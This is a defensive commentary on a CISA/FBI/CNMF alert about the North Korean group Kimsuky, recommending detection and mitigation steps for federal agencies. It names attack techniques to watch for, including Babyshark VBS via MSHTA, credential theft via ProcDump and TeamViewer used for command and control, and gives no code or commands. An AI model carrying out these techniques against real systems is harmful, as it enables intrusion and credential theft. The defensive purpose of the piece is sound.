The majority of the federal remote workforce relies on virtual desktop infrastructures such as Remote Desktop Protocol (RDP) to gain access to and visibility of the agency – and protecting these devices from attacks is critical. In late October, DHS’ Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and U.S. Cyber Command Cyber National Mission Force (CNMF) issued an alert describing the tactics, techniques, and procedures used by North Korean advanced persistent threat group Kimsuky against worldwide targets to gain intelligence on various topics of interest to the North Korean government.
Kimsuky has been using recognizable strategies to exfiltrate the information, such as using web hosting credentials – stolen from individuals outside of their targets – to host their malicious scripts and tools. In this borderless network perimeter, federal agencies must ensure security protocols are in place to protect against increasing cyber threats and gain more visibility into the agency network and endpoints.
As federal agencies look to protect their networks, they should:
- Give heightened attention to alerts from anti-virus, intrusion detection systems (IDS), and other sources with attack methods related to this advisory. Specifically, they should monitor alerts related to this actor to catch suspicious activity. Agencies need functionality that catches attack vectors such as execution of the Babyshark VBS malware (via MSHTA execution), credential theft (via ProcDump), and modifications to disable the firewall.
- Educate users on safe browsing, phishing, and spear phishing. This is an opportunity to give a warning on why security is everyone’s job. It only takes a single user to click a link and compromise a network. Use examples from the alert as well as any real-world examples that your agency has encountered. Recent email phishing campaigns have used topics such as COVID-19 and the North Korean nuclear program.
- Deploy the indicators of compromise (IOCs) stix file provided in the advisory. Search for the filenames and services (e.g. Remote Access Service) and respond to high fidelity indicators immediately.
- Search for persistence mechanisms used by this attacker, such as the Autorun Program Details sensor. This is a good opportunity to baseline and examine your environment. Use this examined baseline to compare with your environment in the future so that future hunting exercises are easier.
- Identify and block command and control mechanisms such as TeamViewer client (netsvcs.exe) with an automated solution. This is a good opportunity to catalog authorized remote software tools and block any unauthorized software.
- Hunt for variations of this attack, as bad actors will inevitably change known signatures especially after such a public announcement.
- Block known Domain Name System (DNS) names from resolving. Log and review any DNS requests to known bad DNS names.
- Use a quarantine capability to immediately revoke network access for any affected hosts.
Agency IT teams must leverage solutions that enforce security policies to harden the network environment and prevent unwanted activity on endpoints from actors like Kimsuky. A solution that can detect, investigate, and respond to threats in real time minimizes the impact of breaches, isolates malware, and mitigates disruption. By knowing their endpoint device and agency network are protected from such threats, targeted individuals and organizations can get back to their regular, important tasks.
As malicious actors find advanced ways to infiltrate systems, it’s important for agencies to be prepared – even if they aren’t fully aware of the new threat tactics. They need to determine the right security solutions and approaches to take that will ensure the network and endpoint devices are protected.